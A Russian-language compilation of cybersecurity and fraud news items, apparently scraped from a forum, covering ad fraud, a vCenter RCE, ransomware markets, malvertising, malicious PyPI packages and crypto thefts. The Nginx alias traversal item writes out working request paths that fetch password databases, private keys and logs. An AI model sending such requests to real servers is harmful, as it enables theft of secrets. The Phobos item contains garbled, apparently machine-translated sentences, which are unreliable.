Исследовательская группа Satori обнаружила Vastflux при расследовании новой схемы мошенничества с рекламой. Они заметили, что приложение генерирует необычно большое количество запросов, используя разные идентификаторы.
Исследователи выполнили реверс-инжиниринг запутанного кода (см. термин «обфускация») JavaScript, который работал в приложении, и обнаружили IP-адрес сервера управления и контроля (C2), с которым оно взаимодействовало, а также отправляемые им команды для создания рекламы.
В HUMAN заявили, что в результате мошеннической кампании злоумышленники внедряли вредоносный JavaScript-код в рекламные объявления, а затем «наслаивали» видеопроигрыватели с рекламой друг на друга. Да таким образом, что ни один из них не был виден пользователю — все они отображались за активным окном. Однако с каждого запущенного видео изобретательным кибербандитам шла монетизация. «Наслоить» таким образом у них получалось до 25 видеопроигрывателей одновременно. Можно сказать наверняка, что заработать хакеры на этом предприятии успели прилично.
Рендеринг нескольких невидимых видеообъявлений
Остановка деятельности Vastflux
HUMAN составила подробную карту инфраструктуры Vastflux и запустила три волны целевых действий в период с июня по июль 2022 года. В конце концов, Vastflux на некоторое время отключил свои серверы C2 и сократил свои операции, а 6 декабря рекламные операции остановились полностью.
Хронология остановки деятельности Vastflux
Хотя мошенничество с рекламой не оказывает злонамеренного воздействия на пользователей приложений, оно вызывает снижение производительности устройств, увеличивает расход заряда батареи и интернет-трафика, а также может привести к перегреву устройства.
Вышеперечисленные симптомы являются распространенными признаками заражения вредоносным ПО или мошенничества с рекламой на устройстве. При обнаружении чего-то подобного на своём смартфоне, стоит попытаться определить приложение, которое потребляет большую часть ресурсов, и навсегда избавиться от него.
Видеореклама потребляет гораздо больше энергии, чем статическая реклама, а несколько скрытых видеоплееров — тем более. Поэтому очень важно всегда следить за запущенными процессами и вовремя выявлять признаки вредоносных программ.
Специалисты VMware исправила несколько опасных уязвимостей в своих продуктах, при этом ИБ-эксперты предупреждают, что хакеры уже сканируют сеть в поисках уязвимых устройств.
Разработчики VMware поблагодарила эксперта компании Positive Technologies Михаила Ключникова за помощь в устранении сразу двух уязвимостей в vCenter Server. Эта платформа предназначена для централизованного управления и автоматизации VMware vSphere, ключевого продукта в современных центрах обработки данных.
Наиболее опасным из двух багов определенно является уязвимость CVE-2021-21972, получившая 9,8 баллов из 10 возможных по шкале CVSS v3. Проблема была обнаружена в составе vSphere Client (плагин для VMware vCenter).
Хуже того, по оценке Positive Technologies, более 90% устройств VMware vCenter находятся целиком внутри периметра компаний, однако часть из них все же доступна удаленно. Исследователи пишут, что таковых насчитывается более 6000 (около 6700, судя по статистике Shodan): четверть таких устройств находятся в США (26%), а затем следуют Германия (7%), Франция (6%), Китай (6%), Великобритания (4%), Канада (4%), Россия (3%), Тайвань (3%), Иран (3%), Италия (3%).
«На наш взгляд, RCE-уязвимость в vCenter Server может представлять не меньшую угрозу, нежели нашумевшая уязвимость Citrix (CVE-2019-19781), — рассказывает Михаил Ключников. — Ошибка позволяет неавторизованному пользователю отправить специально сформированный запрос, который впоследствии предоставит ему возможность выполнять произвольные команды на сервере. После получения такой возможности злоумышленник может развить атаку, успешно продвинуться по корпоративной сети и получить доступ к данным, хранящимся на атакуемой системе (информации о виртуальных машинах, о пользователях системы и т. д.). Если же доступ к уязвимому ПО есть из глобальной сети, то это позволит внешнему злоумышленнику преодолеть внешний периметр организации и также получить доступ к конфиденциальной информации. Еще раз хочется отметить, что уязвимость является опасной, так как ей может воспользоваться любой неавторизованный пользователь».
Click to expand...
Эксперты пишут, что vCenter в своих сетях использует множество компаний, и изначально Positive Technologies намеревалась сохранить подробности об этой проблеме в тайне, чтобы дать системным администраторам больше времени на установку патчей.
__https://twitter.com/x/status/1364323986251907072
Однако китайские ИБ-эксперты уже опубликовали PoC-эксплоит для этой уязвимости, а вслед за этим в сети стали появляться и другие вариации на эту тему. По сути, эксплоитом для этой ошибки служит однострочный запрос cURL, то есть с такой справится даже новичок. В итоге экспертам пришлось раскрыть детали уязвимости раньше времени, и теперь специалисты предупреждают, что злоумышленники уже сканируют интернет в поисках уязвимых устройств.
__https://twitter.com/x/status/1364661586070102016
Вторая исправленная на этой неделе уязвимость (CVE-2021-21973 с оценкой 5,3 по шкале CVSS3) позволяет неавторизованному пользователю отправлять запросы от имени атакуемого сервера. Этот баг может помочь злоумышленнику в развитии дальнейших атак. В частности он получает возможность сканировать внутреннюю сеть организации и собирать данные об открытых портах различных сервисов.
Эксперты Positive Technologies рекомендуют в обязательном порядке установить вышедшие обновления, а также убрать интерфейсы vCenter Server с периметра организаций, если они там есть, а во внутренней сети — выделить их в отдельный VLAN с ограниченным списком доступа.
Источник: xakep.ru/2021/02/25/vcenter-rce/
Прокуратура Могилевской области поддержала в суде государственное обвинение по
уголовному делу в отношении восьми лиц, которым инкриминированы
распространение реквизитов банковских платежных карточек и аутентификационных
данных, посредством которых возможно получение доступа к счетам, а также
пособничество в мошенничестве и хищении путем модификации компьютерной
информации в особо крупном размере.
Как установлено, 21-летнему жителю г.Черикова в ноябре 2022 года в сети
Интернет от неустановленного лица поступило предложение за денежное
вознаграждение заняться сбором и предоставлением сведений, с помощью которых
можно получить доступ к банковским счетам, открытым на других лиц.
Согласившись, молодой человек сначала сам занимался поиском таких граждан, которые, как правило, за 20 рублей были согласны передать ему данные доступа к открытым на них в банках счетам. Когда заказчику потребовалось увеличить объемы получаемых данных, обвиняемый привлек к сбору сведений еще семь человек, включая своих знакомых и одногруппников из числа учащихся колледжа. Он пояснил им, что эти сведения необходимы для вывода криптовалюты.
С ноября 2022 года по февраль 2023 года обвиняемым удалось собрать аутентификационные данные 156 граждан.
Впоследствии неустановленные лица часть полученной информации использовали для перевода чужих денежных средств при совершении хищений.
В итоге жертвами «телефонного мошенничества» стали 46 граждан, проживающих во всех регионах Республики Беларусь. Сумма похищенных у них средств превысила 564 тыс. рублей.
С учетом представленных государственным обвинителем доказательств суд Ленинского района г.Могилева постановил обвинительный приговор. На основании ч.2 ст.222, ч.6 ст.16, ч.4 ст.209, ч.6 ст.16, ч.4 ст.212 Уголовного кодекса Республики Беларусь обвиняемому окончательно назначено наказание в виде лишения свободы на срок 7 лет со штрафом в размере 500 базовых величин (20 тыс. рублей) с отбыванием в исправительной колонии в условиях усиленного режима. Кроме того, с него в пользу потерпевших взысканы причиненный им имущественный вред и компенсация морального вреда.
Остальным шести обвиняемым на основании ч.1 и ч.2 ст.222 Уголовного кодекса Республики Беларусь по совокупности преступлений назначено наказание в виде ограничения свободы без направления в исправительное учреждение открытого типа на срок 3 года каждому со штрафом в размере по 300 базовых величин (12 тыс. руб.). Одному из обвиняемых, который на момент совершения преступления был несовершеннолетним, назначено наказание в виде штрафа в размере 50 базовых величин (2 тыс. рублей).
Приговор в законную силу не вступил, может быть обжалован и опротестован в апелляционном порядке.
• Source: prokuratura.gov.by/ru/media/novosti/nadzor-za-resheniyami-po- ugolovnym-i-grazhdanskim-delam/sobirali-dannykh-chu010724/
Как вымогательское ПО для чайников распространяется на теневых форумах и чем это грозит.
Специалисты из отдела киберразведки компании Sophos в период с июня 2023 года по февраль 2024 года выявили на четырех теневых форумах 19 различных видов вымогательского ПО, которое предлагалось к продаже за относительно небольшие суммы. Цена варьировалась от $20 до 0,5 биткоина (около $13 000 на момент проведения исследования).
Эксперты проводят параллель между этими инструментами и дешевым импортным оружием, которое в 60-70-е годы прошлого века хлынуло на рынок США. Несмотря на ненадежность таких решений, они предоставляют начинающим киберпреступникам ряд существенных преимуществ — низкий порог вхождения в криминальный бизнес и относительно слабую отслеживаемость. Это позволяет заниматься вымогательством самостоятельно, без необходимости взаимодействовать с сетями аффилиатов, которые обычно присваивают себе значительную долю прибыли.
По мнению специалистов Sophos, такие вредоносные программы, как EvilExtractor, действительно могут оказаться ненадежными. Некоторые из них даже содержат встроенные «закладки» — скрытые функции, дающие злоумышленникам возможность удаленно контролировать инфицированные системы или получать доступ к данным как пользователей, так и неопытных «коллег».
Тем не менее, юные хакеры, вероятно, готовы мириться со всеми рисками, поскольку использование подобных инструментов может стать для них первым шагом на пути к более прибыльной деятельности в составе известных киберпреступных группировок.
Хотя эффективность дешевых вымогательских программ в реальных атаках остается невыясненной, исследователи отмечают, что, например, EvilExtractor уже использовалась в прошлом году при атаках в США и Европе. Также имеются сообщения о трех других вариантах, успешно применявшихся злоумышленниками.
Большинство инцидентов, по всей видимости, остаются незамеченными и нераскрытыми, так как они направлены преимущественно против небольших компаний и частных лиц, которые не могут позволить себе дорогостоящие средства защиты.
Анализ активности на теневых форумах, где продаются дешевые вымогательские программы, выявил их «любительский» характер. В отличие от наиболее известных площадок даркнета, здесь пользователи не стесняются задавать глупые вопросы и свободно делятся информацией, в том числе руководствами по разработке и применению ПО. Среди самых популярных материалов — мануал, написанный известным оператором вымогательского ПО под ником Bassterlord.
Исследователи приводят в пример сообщение одного из участников форума, который планировал провести «целевой фишинг для получения доступа к системе, а затем собрать как можно больше ценных данных и запустить программу-вымогатель». Он просил совета у других членов сообщества относительно возможных перспективных целей для такой атаки и рекомендаций по ее осуществлению, поскольку это был его первый опыт.
Sophos подчеркивает серьезность проблемы доступности вредоносных программ на теневых интернет-форумах. Это явление создает значительные трудности для специалистов по кибербезопасности, поскольку большинство таких атак остаются незамеченными и не получают должного освещения. Это оставляет брешь в информации, которую сообществу предстоит восполнить.
sc: news.sophos.com/en-us/2024/04/17/junk-gun-ransomware-peashooters-can- still-pack-a-punch
Даже опытные специалисты не видят подвоха и добровольно пускают хакеров в корпоративные сети.
В последнее время исследователи в сфере кибербезопасности из компании Malwarebytes [наблюдают ](https://www.malwarebytes.com/blog/threat- intelligence/2024/04/active-nitrogen-campaign-delivered-via-malicious-ads-for- putty-filezilla)продолжающуюся волну кибератак, направленную на системных администраторов через мошенническую рекламу утилит PuTTY и FileZilla. Реклама показывается в поисковой системе Google и нацелена на пользователей из Северной Америки, служа хитроумной ловушкой для загрузки вредоносного ПО Nitrogen.
Nitrogen используется злоумышленниками для первоначального доступа к частным сетям, последующей кражи данных и распространения вымогательского ПО, в том числе программ-шифровальщиков авторства ALPHV/BlackCat.
На текущий момент, несмотря на многочисленные обращения специалистов, компания Google всё ещё не предприняла активных действий для блокировки этой вредоносной операции.
Атака состоит из нескольких этапов, каждый из которых рассмотрим далее.
Первый этап. Привлечение жертв через мошенническую рекламу в результатах поиска Google, ведущую на поддельные сайты.
Вредоносные сайты в топе поисковой выдачи Google
Забавно, что злоумышленники настроили шутливое перенаправление на так называемый Rick Roll — культовое музыкальное видео Рика Эстли, если система обнаружит недопустимый трафик. Таким образом, вполне возможно, хакеры хотели поглумиться над исследователями безопасности, которые будут расследовать данную вредоносную кампанию.
Второй этап. Перенаправление на сайты-двойники, которые настолько качественно скопированы, что могут ввести в заблуждение любого пользователя, даже опытных системных администраторов.
Поддельный сайт PuTTY, неотличимый внешне от оригинала
Третий этап. Загрузка и запуск вредоносного программного обеспечения через фальшивый инсталлятор. Используется методика, известная как DLL Sideloading, при которой законный и подписанный исполняемый файл запускает вредоносную DLL- библиотеку. В рассмотренном исследователями случае, при запуске легитимного setup.exe (от Python Software Foundation) происходит побочная загрузка python311.dll (Nitrogen).
DLL Sideloading с использованием легитимного установщика
Эксперты Malwarebytes рекомендуют предпринять следующие защитные меры, чтобы не стать жертвой мошенников:
Таким образом, даже опытные системные администраторы, считающие себя экспертами в компьютерной отрасли, могут стать жертвами изощренных кибератак. Эта история демонстрирует, что вредоносные акторы постоянно совершенствуют свои методы, чтобы обманывать даже самых подготовленных специалистов.
Эффективное RaaS-решение обеспечивает всё больший спрос среди хакеров, включая известный 8Base.
Недавнее исследование Cisco Talos, состоящее из двух частей (первая, вторая) пролило свет на киберпреступников, стоящих за программой-вымогателем 8Base, которые в данный момент используют изменения вымогательского ПО Phobos в рамках финансово мотивированных атак.
Специалисты отметили, что распространение Phobos осуществляется через SmokeLoader, троянский бэкдор, который загружает зашифрованные полезные нагрузки, дешифрует их и активирует компонент программы-вымогателя.
Фокус на 8Base возник в середине 2023 года, когда в сообществе уже наблюдался хороший рост активности кибербезопасности. Исследователи из Carbon Black, подразделения VMware, в июне 2023 года выявили сходства между 8Base и RansomHouse, а также выявили использование расширения «.8base» для зашифрованных файлов в вымогателе Phobos.
Новые данные Cisco Talos показывают, что SmokeLoader используется как платформа для загрузки и активации Phobos, а затем несколько шагов по установленному постоянству в системе, остановке процессов, отключению системного восстановления и удалению резервных копий.
Примечательной оценкой конкурента является полное шифрование файлов размером менее 1,5 МБ и частичное шифрование файлов сверх этого порога для ускорения процесса.
Исследователи особо отметили, что во всех проанализированных образцах Phobos, начиная с 2019 года, используется один и тот же RSA-ключ для защиты ключей шифрования файлов. Это позволяет предположить, что обладание таким ключом дает возможность расшифровать любые данные, зашифрованные образцами древних.
В целом, Phobos предоставляет типичные для вымогателей возможности шифровать файлы на локальных и сетевых дисках. Группа 8Base часто использует украденные учётные данные и инструмент удаленного доступа AnyDesk для распределенного ПО и передает файлы шифрования на заражённых машинах.
Анализ исходного кода Фобос показал, что с 2020 года он практически не менялся. Основные изменения произошли в 2019 году, когда была добавлена поддержка отладочных файлов и данные отчётов за последнее время. Тем не менее, от развёртывания к развёртыванию вымогателя его форма обычно немного меняется.
Фобос впервые появился в 2019 году и, по сути, являлся на тот момент логическим продолжением другого вымогателя — Дхармы (он же Crysis). Cisco Talos считает, что сейчас Phobos использует RaaS-модели, что подтверждается большим объемом электронных адресов и мессенджеров. Каждый проанализированный образец Фобоса включает уникальные контакты для связи с хакерами.
Эксперты «Талос» полагают, что результаты их исследований помогают лучше понять методы работы преступных группировок, использующих Фобос, а также разработать эффективные средства противодействия этому вымогательскому ПО.
Жителя Волгоградской области обвиняют в восьми эпизодах мошенничества, совершенных с помощью и в отношении популярного маркетплейса. 48-летний житель города Новоаннинска оформлял покупки на ничего не подозревавших жителей иностранных государств. В деле оказались замешаны в том числе и знакомые мужчины. Чтобы доказать причастность к махинациям, полицейским пришлось повозиться с его мобильным телефоном.
Как рассказали в ГУ МВД России по Волгоградской области, житель Новоаннинска в теневом сегменте Интернета купил данные восьми банковских карт иностранных граждан. После этого он попросил у знакомых доступы в личные кабинеты маркетплейса и начал совершать покупки.
– Оплата товаров производилась путем списания денежных средств со счетов граждан зарубежных стран. Полученные товары – бытовую химию, одежду, средства электроники мужчина получил в пункте выдачи и использовал для личных целей, – сообщают в Главке полиции.
Удивившись своим покупкам в райцентре Волгоградской области, иностранцы обратились в банки. Последние, в свою очередь, вернули клиентам деньги, а пострадавшим оказался в итоге маркетплейс.
– В результате маркетплейсу был причинен ущерб на сумму свыше 200 тысяч рублей. Поняв, что столкнулись со схемой дистанционного мошенничества, представители интернет-магазина обратились в полицию, – уточняют полицейские. – В ходе проведения оперативно-разыскных мероприятий подозреваемый сотрудниками уголовного розыска был установлен и задержан.
Учитывая, что преступление являлось редким для нашего региона и нестандартным, потребовались дополнительные доказательства совершения данным лицом противоправных деяний.
– С этой целью следователями была назначена компьютерная экспертиза по изъятому у подозреваемого сотовому телефону, не содержащему видимой информации о причастности мужчины к совершению мошенничества. В ходе проведения исследования, экспертами-криминалистами Главка МВД были восстановлены все удаленные файлы, подтверждающие как покупку данных чужих банковских карт, так и приобретение товаров в маркетплейсе. В результате, под влиянием представленных доказательств, злоумышленник сознался в содеянном , – рассказали в Г МВД России по Волгоградской области.
В отношении мужчины было возбуждено уголовное дело по ч. 1 ст. 159.3 УК РФ – «Мошенничество с использованием электронных средств платежа». В настоящее время оно уже направлено в суд для рассмотрения.
Покупки обвиняемый совершал через личные кабинеты на Wildberries.
Снимайте все украшения и часы при входе в зал.
Тренер по боксу из Сиднея (Австралия) Джейми Аллейн тренировал своего бойца, который бил по «лапам» на руках тренера. Из-за давления запястья на Apple Watch Series 7 от ударов на часах активировался голосовой помощник Siri и стал давать инструкции по вызову экстренной службы.
Удары по «лапам» Siri приняла за настоящие выстрелы и вызвала полицию. Как отметил Аллейн, на место преступления приехали 15 офицеров полиции и карета скорой помощи.
Apple Watch уже не первый раз в центре внимания СМИ. Ранее стало известно, что суд США удовлетворил иск медицинской компании Masimo, которая обвинила Apple в нарушении патента на пульсоксиметры для измерения уровня кислорода в крови, использующиеся в Apple Watch Series 6 и более поздних моделях.
source: instagram.com/p/CngSam6pGLD/?hl=en
В репозитории PyPI были обнаружены сразу три вредоносных пакета (requesys, requesrs и requesr), занимавшиеся тайпсквоттингом и подделывающиеся под популярный пакет Requests. Все три пакета представляли собой шифровальщиков и, как оказалось, были созданы скучающим школьником.
Эксперты из компании [Sonatype](https://blog.sonatype.com/ransomware-in-a- pypi-sonatype-spots-requests-typosquat), обнаружившие вредоносов, рассказывают, что любой, кто по ошибке загружал и использовал эти пакеты в своих проектах, становится жертвой довольно странной вымогательской малвари.

Так, все версии пакета requesys (был скачан около 258 раз) содержали скрипты, которые сначала просматривали в Windows такие папки, как Documents, Downloads и Pictures, а затем начинали шифрование файлов.
При этом версии 1.0-1.4 содержали код шифрования и дешифрования, представленный в виде открытого текста, а версия 1.5 уже демонстрировала обфусцированный base64 исполняемый файл, что немного усложняло анализ.
Малварь использовала модуль [Fernet](https://www.geeksforgeeks.org/fernet- symmetric-encryption-using-cryptography-module-in-python/) из криптографической библиотеки для шифрования с симметричным ключом. Fernet также применялся для генерации случайного ключа шифрования, который позже использовался жертвой для расшифровки данных.
Интересно, что в коде была обнаружена одна забавная особенность: вредоносный скрипт запускался лишь в том случае, если имя пользователя ПК под управлением Windows отличалось от «GIAMI». Очевидно, это юзернейм самого автора малвари.

Если все проходило успешно, и шифровальщик запускался в системе жертвы, пострадавший пользователь видел всплывающее сообщение с дальнейшими инструкциями: ему предлагалось связаться с автором пакета b8ff, также известным как OHR (Only Hope Remains), через Discord-сервер.

Исследователи говорят, что попасть на Discord-сервер хакера мог любой желающий. Там они обнаружили канал «#ransomware-notifications, который содержал список имен пользователей для 15 жертв, которые установили и запустили вредоносный пакет из PyPI. Автоматически сгенерированные сообщения также демонстрировали ключи дешифрования, которые жертвы могли использовать для расшифровки своих файлов, заблокированных requesys.

Как уже было упомянуто, версия 1.5 была чуть сложнее, имела обфускацию и поставлялась в виде 64-битного исполняемого файла Windows. Но в целом этот EXE действовал также, как малварь прошлых версий, то есть генерировал ключ шифрования/дешифрования, загружал копию ключа в Discord автора, шифровал файлы и побуждал жертв перейти в канал для спасения данных.
Аналитики рассказывают, что им без особенного труда удалось вычислить автора этого незамысловатого вредоноса: OHR (Only Hope Remains) или b8ff опубликовал код эксплоита на GitHub (с пометкой, что автор не несет ответственности в случае неправомерного использования) и, не скрываясь, использовал этот же ник в PyPI, Discord, GitHub и на других сайтах. Оказалось, что у OHR есть даже канал на YouTube с довольно безобидными туториалами по взлому (теперь удалены).

Однако тайпсквоттерские пакеты не содержали никакого отказа от ответственности, то есть в их случае не было никаких заявлений и уведомлений о том, что пакеты опубликованы в рамках этичного исследования, и OHR не пытался удержать людей от заражения своих ПК. Напротив, сразу после установки пакеты запускали вредоносные скрипты.
В итоге исследователи решили связаться с автором шифровальщиков и узнать о его мотивах. B8ff легко пошел на контакт и сообщил Sonatype, что вымогательский скрипт в этих пакетах являлся «полностью опенсорсным» и был частью проекта, который создавался «шутки ради». Несмотря на тот факт, что пакеты действительно шифровали пользовательские данные, автор заявил, что технически они безвредны.
«Технически это вымогатель без выкупа, — сказал b8ff, имея в виду, что не требует денег после шифрования. — Все ключи дешифрования [отправляются] в канал #ransomware-notifications на моем сервере в Discord».
Click to expand...
B8ff рассказал экспертам, что он из Италии и описал себя как школьника, который пока просто учится разработке и лишь недавно заинтересовался эксплоитами, и простотой их создания.
«Я был удивлен, когда понял, как легко создать такой эксплоит и насколько это интересно. Я еще учусь в школе и на данный момент знаю Python, Lua, HTML, немного CPP и все», — признается b8ff.
Click to expand...
Эксперты уже уведомили о своей находке PyPI, но пока не получили ответа. Зато после общения со специалистами b8ff сам помог предотвратить дальнейшие атаки и переименовал пакет requesys, чтобы разработчики, опечатавшиеся в названии requests, случайно не загружали программу-вымогатель. Два других пакета и вовсе удалены из PyPI (правда неясно, самим автором добровольно или администраторами PyPI).
Криптохакеру удалось получить в качестве вознаграждения $1,76 млн.
Crema Finance, первый специализированный протокол ликвидности на блокчейне Solana, недавно столкнулся с крупной атакой, которая привела к потере криптовалюты на сумму 9 млн долларов. Однако Crema Finance удалось вернуть свое состояние.
После того, как хакеру удалось украсть $9M через флэш-кредиты Solend,
украденные Ethereum (ETH) и Solana (SOL) были успешно отслежены. Чуть позже
был установлен адрес, предположительно принадлежащий хакеру. Crema Finance
воздержалась от обращения к властям и немедленно связалась с мошенником. После
долгих и трудных переговоров между хакером и компанией было достигнуто
соглашение. Представители компании назвали хакера «белой шляпой».
Криптохакеру удалось получить в качестве вознаграждения 45 455 соланов (SOL),
что составляет $1,76 млн. Остальные $7,3 млн в украденных ETH и SOL были
возвращены.
«После длительных переговоров хакер согласился оставить 45 455 SOL в качестве вознаграждения за «белую шляпу». Мы подтверждаем получение 6 064 ETH и 23 967,9 SOL в четырех транзакциях», - сказали в Crema Finance.
Изначально хакеру предлагали награду в $800 тыс., однако злоумышленник не согласился, и сумма была увеличена вдвое.
Расследование также показало интересные подробности
После международной операции правоохранительных органов США и Кипра даркнет- рынок SSNDOB был отключен. На SSNDOB продавались имена, номера социального страхования и даты рождения примерно 24 млн. жителей США.
Были конфискованы четыре домена, на которых размещалась торговая площадка SSNDOB: «ssndob.ws», «ssndob.vip», «ssndob.club» и «blackjob.biz ». SSNDOB состоял из нескольких сайтов, действующих как зеркала друг друга, чтобы предотвратить DDoS-атаки или операции правоохранительных органов.
Согласно исследователям компании Advanced Intel, большая часть информации была получена в результате утечки данных в сфере здравоохранения . Затем другие злоумышленники использовали эту информацию для мошенничества.
Исследователи Chainalysis предположили связь SSNDOB с крупной кардинговой торговой площадкой Joker’s Stash, который закрылся в феврале 2021 года . «В период с декабря 2018 года по июнь 2019 года SSNDOB отправил биткойнов на сумму более $100 тыс. в Joker's Stash. Мы предпологаем, что два рынка могли иметь какое-то отношение друг к другу, включая совместное владение», - пояснили в отчете Chainalysis .
source: justice[.]gov/usao-mdfl/pr/ssndob-marketplace-series-websites-listed- more-20-million-social-security-numbers-sale
Кибернетическое командование вооруженных сил США в прошлую среду 12-ого января подробно описало несколько хакерских инструментов, которые по словам официальных лиц Министерство информации и национальной безопасности Ирана использовало против компьютерных сетей по всему миру.
По словам представителя командования, это первый случай, когда правительство США прямо связало министерство разведки Ирана со шпионской группой известной как MuddyWater, которая в последние годы пыталась выкачать данные из телекоммуникационных фирм и других организаций по всему Ближнему Востоку.
Это часть регулярных усилий Киберкомандования и других агентств США по выявлению хакерских инструментов, предположительно используемых иностранными разведывательными службами из России, Китая, Ирана и Северной Кореи, чтобы смягчить последствия их шпионских операций.
Киберкомандование опубликовало несколько образцов вредоносного кода предположительно использованного иранскими хакерами, чтобы помочь организациям в США и других странах защитить себя от будущих попыток вторжения. Представитель Киберкомандования отказался комментировать на вопрос "Использовалось ли вредоносное ПО в последнее время против американских организаций?"
Постоянное представительство Ирана при ООН для CNN сделала заявление что Иран отвергает эти безосновательные обвинения и считает, что это форма психологической войны против Ирана не имеющие никакой ценности.
Сара Джонс главный аналитик компании Mandiant специализирующейся на кибербезопасности сказала что в Иране есть несколько групп, которые занимаются кибершпионажем, кибератаками и информационными операциями.
Службы безопасности, которые спонсируют министерство информации и национальной безопасности Ирана и Корпус стражей исламской революции, используют их чтобы опередить противников и конкурентов Ирана во всем мире.
По мнению аналитиков, MuddyWater был ключевым компонентом иранского аппарата кибершпионажа. Хакеры например предприняли многомесячную попытку взлома правительственных сетей в Турции, Иордании и Ираке, которая началась в 2019 году и продолжилась после убийства американскими военными высокопоставленного иранского генерала в январе 2020 года.
Microsoft says that the number of monthly web shell attacks has almost doubled since last year, with an average of 140,000 such malicious tools being found on compromised servers every month.
Жительница Москвы, пенсионерка 1947 года рождения, обратилась в полицию с заявлением на своего внука, заподозрив того в краже денег у собственного дедушки.
Женщина обратилась к члену семьи, чтобы тот «прикрыл» ее заимствования из
кошелька мужа, пока тот находится в больнице.
Бабушка попросила молодого мужчину приобрести 100 тыс. рублей в «банке
приколов», чтобы заменить две купюры по 5 тыс. рублей в кошельке с
накоплениями мужа, на ненастоящие. Таким образом, тот бы не сразу заметил их
отсутствие при возвращении домой.
Однако внук перестарался и, приехав к женщине, заменил все купюры из неприкосновенного запаса на поддельные. Таким образом, бабушка не досчиталась в кошельке дедушки 90 тыс. рублей.
Владелец баскетбольной команды Dallas Mavericks Марк Кубан пострадал от атаки хакеров ― они получили доступ к его горячему кошельку и вывели криптоактивов на сумму $870 000.
О взломе сообщил аналитик блокчейнов под псевдонимом Wazz. Он обнаружил, что с кошелька Марка Кубана (Mark Cuban) вывели все криптоактивы, при этом адрес миллиардера до этого бездействовал около 5 месяцев.
Lmao, did Mark Cuban's wallet just get drained?
Wallet inactive for 160 days and all assets just moved pic.twitter.com/vWnMZFyHB5
— Wazz (@WazzCrypto) September 15, 2023Click to expand...
Злоумышленникам удалось вывести 175 000 токенов USDC, 4 860 USDT, 7 020 RARI, 12 360 MATIC и 338,21 stETH. Также миллиардер потерял 5,29 ETH, 8,247 WETH, 697 480 RARE, 16 670 BIT, 5,92 GOHM и 10 000 AUDIO.
Как позднее признался сам Марк Кубан, похоже, что злоумышленники заразили его компьютер вирусом и терпеливо ждали, пока он зайдет в кошелек MetaMask. Когда это произошло они начали выводить средства. Миллиардер заметил это и переместил 3,049 млн стейблкоинов USDC на кошелек Coinbase Custody, чтобы сохранить их. Тем не менее, его общие потери составили $870 000.
He transfered $2M $USDC he had on Matic too, but to a different wallet than the $ETH one
Seeing as he made a test tx first this time, Im gonna assume it's actually him moving funds here. pic.twitter.com/A7KS4WzGkv
— Wazz (@WazzCrypto) September 16, 2023Click to expand...
Напомним, что в 2021 году Марк Кубан потерял неизвестную сумму денег в мошенническом проекте DeFi Iron Finance. Тогда он заявил, что данную отрасль необходимо регулировать.
• Source: <https://www.dlnews.com/articles/people-culture/mark-cuban- loses-870k-to-a-crypto-scam/>
Некоторые серверы с nginx остаются уязвимы для техники Nginx Alias Traversal, которая была [предложена](https://i.blackhat.com/us-18/Wed-August-8/us-18-Orange-Tsai- Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days- Out-2.pdf) на конференции Blackhat ещё в 2018 году и позволяет получить доступ к файлам и каталогам, размещённым вне корневого каталога, заданного в директиве "alias". Проблема проявляется только в конфигурациях с директивой "alias", размещённой внутри блока "location", параметр которой не завершается на символ "/", в то время как "alias" завершается на "/".
Суть проблемы в том, что файлы для блоков с директивой alias отдаются через прикрепление запрошенного пути, после его сопоставления с маской из директивы location и вырезания заданной в этой маске части пути. Для показанного выше примера уязвимой конфигурации атакующий может запросить файл "/img../test.txt" и этот запрос подпадёт под указанную в location маску "/img", после чего остающийся хвост "../test.txt" будет прикреплён к пути из директивы alias "/var/images/" и в итоге будет запрошен файл "/var/images/../test.txt". Таким образом, атакующим может получить доступ к любым файлам в каталоге "/var", а не только к файлам в "/var/images/", например, для загрузки лога nginx можно отправить запрос "/img../log/nginx/access.log".
В конфигурациях, в которых значение директивы alias не завершается символом "/" (например, "alias /var/images;"), атакующий не может перейти в родительский каталог, но имеет возможность запросить другой каталог в /var, начало имени которого совпадает с указанным в конфигурации. Например, запросив "/img.old/test.txt" можно получить доступ к каталогу "var/images.old/test.txt".
Анализ репозиториев на GitHub показал, что приводящие к проблеме ошибки в настройке nginx до сих пор встречаются в реальных проектах. Например, наличие проблемы было выявлено в серверной части менеджера паролей Bitwarden и могло использоваться для доступа ко всем файлам в каталоге /etc/bitwarden (запросы /attachments отдавались из /etc/bitwarden/attachments/), включая хранимую там БД с паролями "vault.db", сертификат и логи, для получения которых достаточно было отправить запросы "/attachments../vault.db", "/attachments../identity.pfx", "/attachments../logs/api.log" и т.п.
Метод также сработал с Google HPC Toolkit, в котором запросы /static перенаправлялись в каталог "../hpc-toolkit/community/front- end/website/static/". Для получения БД с закрытым ключом и учётными данными атакующий мог отправить запросы "/static../.secret_key" и "/static../db.sqlite3".
Французские прокуроры заявили, что они поймали двух крипто-мошенников, которые использовали «чемоданы», полные фальшивых денег, чтобы обманом заставить криптоинвесторов передать биткоины (BTC), USDC и Ethereum (ETH) на десятки тысяч долларов.
France Blue сообщила, что двое мужчин использовали псевдонимы. Сообщается, что они уговаривали потенциальных жертв «всех национальностей» встретиться с ними в роскошных отелях или дорогих ресторанах.
Похоже, что дуэт выдавал себя за внебиржевых покупателей криптовалюты и якобы обращался к держателям криптовалют со слишком хорошими, чтобы быть правдой, предложениями купить их монеты.
Прокуратура Бордо сообщила подробности арестов и предполагаемых преступлений. Но в расследовании, похоже, участвовали полицейские со всей страны и за ее пределами.
Прокуратура заявила, что предполагаемые мошенники скрылись с токенами на сумму более 1,5 миллиона долларов после того, как обманули жертву на встрече, состоявшейся в июле 2019 года в Милане, Италия. На встречах в 2020 году в Париже и снова в Милане они, похоже, сбежали с криптовалютой на сумму около 500 000 долларов.
Офицеры провели обыск их собственности. Они заявили, что в ходе рейдов изъяли наличных на сумму около 61 000 долларов. Они также конфисковали «два автомобиля Porsche, автомобиль Bentley и роскошные часы, стоимость которых оценивается почти в 53 000 долларов».
Прокуратура объяснила, что, поразив своих предполагаемых жертв огромными деньгами в роскошной обстановке, мошенникам удалось завоевать доверие своих потенциальных жертв — до такой степени, что они позволили мужчинам получить доступ к приложениям на своих мобильных устройствах.
Затем предполагаемые мошенники использовали изощренные методы «манипулирования», чтобы «получить закрытые ключи» к своим криптокошелькам и украсть больше монет.
Эти двое подозреваемых были помещены под стражу до суда по обвинению в организованном мошенничестве, отмывании денег, преступном сообществе, подделке документов и отказе сотрудничать с полицией при расследовании.
СМИ отметили, что они также отказались сообщать офицерам коды доступа к своим мобильным устройствам.
